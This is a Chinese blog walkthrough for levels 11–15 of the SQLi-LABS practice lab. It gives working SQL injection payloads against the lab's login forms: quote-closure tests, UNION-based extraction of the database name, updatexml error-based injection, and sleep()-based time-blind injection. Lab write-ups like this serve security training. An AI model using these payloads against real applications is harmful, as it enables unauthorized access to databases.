SQLi-LABS【11-15关】通关攻略

于 2024-08-19 20:57:27 发布
阅读量218 收藏 4
点赞数 4
分类专栏: SQLi-LABS通关攻略 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65852138/article/details/141333538
版权

SQLi-LABS 11关

1.第11关是post注入,利用表单进行注入,这里要使用表单进行搜索注入或者BurpSurite抓包

这里我们只用搜索注入

2.在Username中进行sql闭合方式测试

1'              //报sql语法错误

1' #           //无回显,表示正常

闭合方式是字符型 '

 3.使用联合查询语句进行数据库查询,得到数据库名security

1' union select 1,database() #

 SQLi-LABS 12关

1.该关也是post注入,同样的,可以使用搜索框注入或者burpsurite抓包

由于11关使用的搜索注入,这关我们使用抓包

2.在username输入随意字符提交进行抓包,这里输入‘1’

得到包后,发送到Rapeater

3.注入点就是刚才输入的1

在1后面进行闭合方式测试

1' --+     //没有回显

1"          //报sql语法错误

1" --+     //报sql语法错误

1") --+    //不再报错

所以是字符型注入"

4.使用联合查询进行数据库名查询

注入语句:

1") union select 1,database() --+

SQLi-LABS 13关

1.这一关按照11关12关的方式进行sql注入测试

1'         //报错

1' #      //报错

1"        //无回显

1') #    //无回显

所以是字符型 ')

2.在进行测试中,发现有报错信息,所以使用报错注入

注入语句:

1') union select 1,updatexml(1,concat(1,(select database())),1) #

 

SQLi-LABS 14关

1.和13关一样,使用报错注入

2.判断闭合方式

1' #        //无回显

1"          //报错

1" #       //无回显

所以是字符型 "

3.使用报错注入语句

注入语句:

1" union select 1,updatexml(1,concat(1,(select database())),1) #

SQLi-LABS 15关 

1.该关进行sql测试时发现无论输入什么都没有回显,所以只能使用时间盲注

2.测试是否可以使用时间盲注,就是使用sleep()函数进行延时测试

admin' and sleep(3) #     //有明显延迟

所以闭合方式是 ' #且可以使用时间盲注

3.通过时间盲注语句进行注入,得到数据库名

注入语句:

admin' and if((ascii(substr(database(),1,1))=115),sleep(5),0) #

以此类推,更改参数得到数据库名security

Zhong-Xin
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
详细sqli-labs(1-20)通关讲解
05-18
### SQLi-Labs 1-20 卡详解 #### 第一:判断是否存在 SQL 注入 本目的是为了帮助用户了解如何判断一个网站是否存在 SQL 注入漏洞,并通过不同的输入来观察反馈信息的变化,以此来确认是否存在漏洞。 **实验...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs(11-15)通关讲解
weixin_53736204的博客
07-28 390
以POST传入,使用报错注入。
sqli-labs 第七 多命通关攻略
两个月亮
01-05 1691
错误输入与不正常输入的返回结果是相同的。该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。怎么会这样?等等,我们刚刚得出的结论好像被忽略了:该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。既然返回结果为空都将返回,那我们刚刚构造的判断语句又怎么能够判断出注入类型呢?在遇到读写权限问题后,尝试向搜索引擎寻求帮助,但解决方案大多针对 Linux 操作系统且并不详细,只好自己摸索了。
sqli-labs 11~14 多命通关攻略(报错注入)
两个月亮
01-16 557
由于该卡中会提示错误信息,所以我们可以通过报错注入来爆破数据库
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1283
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
【详细】 Sqli-labs1~65 通关详解 解题思路+解题步骤+解析
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65 通关详解 解题思路+解题步骤+解析 详细,超级详细
Sqli-labs靶场1-20通关宝典
2203_75440207的博客
05-18 2037
本文章主要是sqli-labs靶场1-20通关方法
Sqli-labs靶场第15详解[Sqli-labs-less-15]自动化注入-SQLmap工具注入
m0_73615178的博客
03-02 818
由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。
SQLI-labs-第十八
weixin_54055099的博客
05-17 546
Sqli-labs18,http头部注入,报错注入
sqlilabs过手册注入天书,过sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
sqlilabs过手册注入天书.pdf
09-14
"sqlilabs过手册注入天书.pdf"是SQL注入学习与实践的一份资料,主要围绕名为sqli-labs的实验室环境进行介绍和讲解。 首先,文档提到了SQL注入和sqli-labs的介绍,强调了SQL注入的危害以及学习SQL注入的重要性...
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构
cybersnow精通 28 门计算机语言,凭借其超凡的技术能力,成功开发过上万个应用,广泛涉及政府、商业、个人等众多领域,甚至在检察院、环保局、公安局等专业场景中也大放异彩。不仅熟练掌握单片机和物联网开发,在软件架构设计方面更是独树一帜,自创了跨平台软件
08-15 275
【代码】webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构。
linux安装达梦数据库
最新发布
HAN_789的博客
08-19 117
如果无法创建dmdba 文件夹,需要进入root用户下 在管理员用户下,这种安装方式一般只用于验证,开发,测试,生产最好还是安装传统的方式安装。在 home/dmdba/dmdbms/bin 目录下执行。(1)将文件上传到 /home/dmdba/ 目录下。(2)加压:tar -xzvf dmdb.tar.gz。进入到root就可以创建dmdba 文件夹了。1、后台启动,一般建议用后台启动。
网上商品订单转手系统bootpf
weixin_43213064的博客
08-18 463
【代码】springboot网上商品订单转手系统bootpf
mysql介绍
weixin_57763462的博客
08-14 405
丰富的存储引擎:MySQL 提供了多种存储引擎,如 InnoDB、MyISAM、Memory 等,每种存储引擎都有其特定的应用场景和优势。多语言支持:MySQL 支持多种编程语言,包括 C、C++、Python、Java、Perl、PHP 等,并提供了相应的 API。安全性:MySQL 提供了灵活的权限和密码系统,支持基于主机的验证,并且所有的密码传输都采用加密形式,确保了数据的安全性。管理工具:MySQL 提供了丰富的管理工具,如命令行客户端、图形界面管理工具等,方便用户进行数据库的管理和维护。
sqli-labs通关28
03-05
通关28其中的一个卡,下面是sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值